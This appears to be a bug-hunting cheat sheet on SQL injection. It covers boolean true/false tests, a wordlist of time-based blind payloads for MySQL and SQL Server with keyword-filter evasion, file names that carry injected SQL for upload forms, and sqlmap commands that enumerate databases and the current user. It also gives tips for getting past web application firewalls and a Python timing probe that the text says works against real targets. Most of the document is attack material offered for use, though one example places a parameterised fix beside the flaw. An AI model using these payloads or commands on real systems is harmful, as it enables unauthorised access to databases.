SQL Injection
How to find a SQL injection vulnerability?
1) Logical Operation
One of the most reliable ways to confirm a SQL injection is to make the query evaluate a logical condition you control and check that the response changes the way you expect. For example: if the GET parameter ?username=Slacker returns the same content as ?username=Slacker'+and+'1'='1 (a true condition appended to the original value), and a false condition such as ?username=Slacker'+and+'1'='2 returns different content (no result), then you have found a SQL injection. Check both cases: the true condition alone can match by accident, for instance when the application ignores the parameter, and the false condition rules that out.
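The true/false comparison above, as an added example that is not part of the original page: a constructed SQLite database, the vulnerable string-concatenated lookup beside its parameterised form, and one function that applies the check to either. The table layout, user names and function names are assumptions made for the demo.

```python
import sqlite3

# Constructed stand-in for the application's user table (not the page's data).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO users (username, email) VALUES (?, ?)",
        [("Slacker", "slacker@example.com"), ("alice", "alice@example.com")],
    )
    return conn

def vulnerable_lookup(conn, username):
    """The bug: the request parameter is pasted into the SQL text, so a quote
    in the value ends the string literal and the rest is parsed as SQL."""
    sql = "SELECT id, username, email FROM users WHERE username = '%s'" % username
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error:
        # A broken query (unbalanced quotes) is itself a distinct response.
        return None

def safe_lookup(conn, username):
    """The fix: a bound parameter is always data, never SQL, so the same
    payloads are simply looked up as literal user names."""
    sql = "SELECT id, username, email FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()

def boolean_differential(fetch, known_value):
    """Apply the logical-operation check to any lookup function.

    A true condition appended to a known-good value must leave the response
    unchanged, and a false condition must change it. Requiring both rules out
    endpoints that ignore the parameter entirely (where everything looks equal).
    """
    baseline = fetch(known_value)
    if not baseline:
        raise ValueError("pick a value that returns content, or the comparison is meaningless")
    true_case = fetch(known_value + "' AND '1'='1")   # ... WHERE username = 'Slacker' AND '1'='1'
    false_case = fetch(known_value + "' AND '1'='2")  # ... WHERE username = 'Slacker' AND '1'='2'
    return true_case == baseline and false_case != baseline

def demo():
    conn = make_db()
    return {
        "vulnerable": boolean_differential(lambda v: vulnerable_lookup(conn, v), "Slacker"),
        "safe": boolean_differential(lambda v: safe_lookup(conn, v), "Slacker"),
    }

if __name__ == "__main__":
    print(demo())  # {'vulnerable': True, 'safe': False}
```

Against the vulnerable lookup the true condition returns the Slacker row and the false one returns nothing, so the check fires; against the parameterised lookup both payloads are searched for as literal user names, both return nothing, and the check stays quiet.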
2) Time Based SQL Injection
The most likely places to inject SQL payloads in POST requests are the login page (username parameter), the forgot-password page (username parameter) and the signup page (first name and last name parameters).
Payloads:
orwa' AND (SELECT 6377 FROM (SELECT(SLEEP(5)))hLTl)--
(SlEeP%09(14-(5-2)))
')) or sleep(5)='
' WAITFOR DELAY '0:0:5'--
;waitfor delay '0:0:5'--
);waitfor delay '0:0:5'--
';waitfor delay '0:0:5'--
";waitfor delay '0:0:5'--
');waitfor delay '0:0:5'--
");waitfor delay '0:0:5'--
));waitfor delay '0:0:5'--
0"XOR(if(now()=sysdate(),sleep(12),0))XOR"Z
0"XOR(if(now()=sysdate(),sleep(12),0))XOR"Z%20=%3E
0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z
The SLEEP variants target MySQL and the WAITFOR DELAY variants target Microsoft SQL Server; the prefixes (quote, double quote, bracket, semicolon) close whatever context the parameter lands in. The mixed-case SlEeP with a URL-encoded tab (%09) instead of a space is there to slip past naive keyword filters.
How To Test?
1) Use this wordlist with Intruder and inject every payload into the relevant parameters and headers (User-Agent, Cookie, Referer, X-Requested-With, ...). A single slow response is not proof: repeat the request, compare it with the response time of a clean value, and change the sleep length to make sure the delay follows the payload rather than the network.
2) Once you get the delay, save the request to a text file and use sqlmap to confirm and exploit the vulnerability:
sqlmap -r request.txt -p parameter-name --force-ssl --level 5 --risk 3 --dbs --hostname --current-user
sqlmap -r request.txt -p user --force-ssl --level 5 --risk 3
sqlmap -r request.txt -p email --force-ssl --level 5 --risk 3 --dbms="MySQL" --test-filter="MySQL >= 5.0.12 AND time-based blind (query SLEEP)"
(use -p username instead of -p email when the username field is the injectable one)
Sometimes you cannot exploit it because most modern web apps sit behind a WAF and validate user input before the query is executed, so you can try:
- changing the request from POST to GET, or the reverse
- using --random-agent
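The time-based check from steps 1 and 2, as an added example that is not from the original page: a small Python probe that times clean requests, then sends one of the sleep payloads listed above either in a parameter or in the User-Agent header, and only reports a hit when every payload sample is slower than the clean median by most of the requested delay. The target is a constructed local HTTP server that imitates a vulnerable app by sleeping whenever it sees sleep(N) in its input; the /login URL, the username parameter, the one-second delay and the 0.8 threshold are assumptions for the demo.

```python
import re
import statistics
import threading
import time
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

DELAY = 1  # seconds of sleep the payload asks for (kept short for the demo)

class FakeVulnApp(BaseHTTPRequestHandler):
    """Constructed target, not a real database: it sleeps N seconds whenever a
    query parameter or the User-Agent header contains sleep(N), which is what a
    MySQL backend would do if the value were concatenated into the query."""

    def do_GET(self):
        params = urllib.parse.parse_qs(urllib.parse.urlparse(self.path).query)
        inputs = [v for values in params.values() for v in values]
        inputs.append(self.headers.get("User-Agent", ""))
        for value in inputs:
            m = re.search(r"sleep\((\d+)\)", value, re.IGNORECASE)
            if m:
                time.sleep(int(m.group(1)))
        body = b"ok"
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo output quiet
        pass

def timed_get(url, headers=None):
    """Round-trip time of one GET request, in seconds."""
    req = urllib.request.Request(url, headers=headers or {})
    start = time.perf_counter()
    with urllib.request.urlopen(req, timeout=60) as resp:
        resp.read()
    return time.perf_counter() - start

def is_delayed(baseline, samples, delay, fraction=0.8):
    """Decision rule: use the fastest payload sample, so one slow response
    caused by network jitter cannot produce a hit; every sample must exceed
    the clean median by most of the requested delay."""
    return min(samples) - statistics.median(baseline) >= fraction * delay

def probe(base_url, param, payload, delay, inject_header=None, repeats=2):
    """Time clean requests, then the same request with the payload placed
    either in `param` or in the header named by `inject_header`."""
    clean_url = base_url + "?" + urllib.parse.urlencode({param: "slacker"})
    baseline = [timed_get(clean_url) for _ in range(3)]
    if inject_header:
        samples = [timed_get(clean_url, {inject_header: payload}) for _ in range(repeats)]
    else:
        url = base_url + "?" + urllib.parse.urlencode({param: payload})
        samples = [timed_get(url) for _ in range(repeats)]
    return is_delayed(baseline, samples, delay)

def run_demo():
    server = HTTPServer(("127.0.0.1", 0), FakeVulnApp)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    base = "http://127.0.0.1:%d/login" % server.server_address[1]
    payload = "0'XOR(if(now()=sysdate(),sleep(%d),0))XOR'Z" % DELAY  # one of the page's payloads
    try:
        return {
            "username_param": probe(base, "username", payload, DELAY),
            "user_agent_header": probe(base, "username", payload, DELAY, inject_header="User-Agent"),
            "harmless_value": probe(base, "username", "orwa", DELAY),
        }
    finally:
        server.shutdown()
        server.server_close()

if __name__ == "__main__":
    print(run_demo())  # {'username_param': True, 'user_agent_header': True, 'harmless_value': False}
```

The same `probe` call works against a real target by pointing `base_url` at it; the repeated samples and the minimum-based rule are what keep a congested network from looking like a sleeping database, and a harmless value is probed alongside so you can see the rule stay quiet when nothing is injected.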
3) File uploader SQLi
Save a file under each of these names and upload it to the site:
--sleep(15).png
--sleep(63).png
--sleep(25).png
--sleep(57).png
pic.png;waitfor delay '0:0:5'--
The delay only shows up if the upload handler concatenates the file name into a query, so treat it like any other time-based test: the response should stall for about the number of seconds in the name, and a different number should give a different stall.